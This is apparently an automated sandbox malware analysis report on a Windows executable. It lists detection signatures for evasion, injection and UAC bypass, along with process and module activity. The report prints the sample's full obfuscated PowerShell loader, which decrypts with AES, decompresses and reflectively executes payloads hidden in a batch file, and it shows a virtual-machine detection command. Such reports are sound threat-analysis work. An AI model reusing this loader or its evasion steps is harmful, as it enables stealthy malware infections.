Windows Analysis Report
XgKnAQpuPM.exe

Overview

General Information

Sample name: XgKnAQpuPM.exe (renamed because the original name is a hash value)
Original sample name: 52c1acdcbb715dd099648b26b98254e8.exe
Analysis ID: 1528503
MD5: 52c1acdcbb715dd099648b26b98254e8
SHA1: e3cd07adc9d8fe7c2fbb07730845af6555af2e66
SHA256: 8dc774bd289aeb18dee994fea6e69039d9c6e77a1b90a0d9db004109735ef3f9
Tags: 64exe

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code contains potential unpacker
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D13214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA, 0_2_00007FF776D13214

Exploits

Source: Yara match File source: 7.2.powershell.exe.1c691b00b88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.powershell.exe.1c690beb3b8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.powershell.exe.1c691600b50.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2185544424.000001C6916F8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2029388668.000001C68BEA1000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2185544424.000001C691B00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2185544424.000001C690CF8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR
Source: XgKnAQpuPM.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: System.Configuration.Install.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: wextract.pdb source: XgKnAQpuPM.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdbl source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: wextract.pdbGCTL source: XgKnAQpuPM.exe
Source: Binary string: System.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.CSharp.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdbP4~ source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.pdbP source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb` source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.pdbH source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: mscorlib.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Numerics.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D12034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00007FF776D12034
Source: unknown DNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.10.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp, Null.7.dr String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D12D97 GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle, 0_2_00007FF776D12D97
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx, 0_2_00007FF776D11BF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11D10 0_2_00007FF776D11D10
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D16F14 0_2_00007FF776D16F14
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D168F0 0_2_00007FF776D168F0
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D141B4 0_2_00007FF776D141B4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D12F7B 0_2_00007FF776D12F7B
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D15F80 0_2_00007FF776D15F80
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11BF4 0_2_00007FF776D11BF4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D15F7E 0_2_00007FF776D15F7E
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D1366E 0_2_00007FF776D1366E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576
Source: XgKnAQpuPM.exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 3397176 bytes, 1 file, at 0x2c +A "vclib.bat", ID 885, number 1, 157 datablocks, 0x1503 compression
Source: XgKnAQpuPM.exe Binary or memory string: OriginalFilename vs XgKnAQpuPM.exe
Source: XgKnAQpuPM.exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs XgKnAQpuPM.exe
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2701
Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal92.expl.evad.winEXE@14/11@1/0
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D16F14 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA, 0_2_00007FF776D16F14
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D12F7B CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17, 0_2_00007FF776D12F7B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\7749332
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3352
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
Source: XgKnAQpuPM.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Source: unknown Process created: C:\Users\user\Desktop\XgKnAQpuPM.exe "C:\Users\user\Desktop\XgKnAQpuPM.exe"
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Process created: C:\Windows\System32\cmd.exe cmd /c "vclib.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 
'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Section loaded: feclient.dll
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Section loaded: advpack.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: XgKnAQpuPM.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: XgKnAQpuPM.exe Static file information: File size 3571712 > 1048576
Source: XgKnAQpuPM.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x359000
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: System.Management.Automation.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: mscorlib.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Numerics.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: XgKnAQpuPM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: XgKnAQpuPM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: XgKnAQpuPM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: XgKnAQpuPM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: XgKnAQpuPM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, ---.cs .Net Code: _F6A9_24CA_2622_EF60_FFFD System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, 